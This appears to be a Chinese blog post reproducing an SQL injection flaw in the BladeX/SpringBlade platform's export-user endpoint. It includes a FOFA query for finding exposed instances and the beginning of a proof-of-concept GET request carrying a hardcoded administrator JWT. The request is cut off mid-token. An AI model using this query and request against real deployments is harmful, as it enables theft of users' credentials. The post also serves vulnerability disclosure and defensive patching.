BladeX企业级开发平台 export-user SQL 注入漏洞复现

本文详细介绍了SpringBlade v3.2.0及其以前版本的一个安全漏洞,该漏洞允许攻击者通过export-user路径利用customSqlSegment进行SQL注入,可能导致用户敏感信息泄露。复现环境中发现该问题,厂商已发布修复程序,建议用户及时更新并采取防火墙策略限制访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

BladeX是一款精心设计的微服务架构,提供 SpringCloud 全套解决方案,开源中国首批完美集成 SpringCloud Alibaba 系列组件的微服务架构,基于稳定生产的商业项目升级优化而来,更加贴近企业级的需求,追求企业开发更加高效。

0x02 漏洞概述

BladeX企业级开发平台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。

0x03 复现环境

FOFA:body="https://bladex.vip"

0x04 漏洞复现

PoC

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMj
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值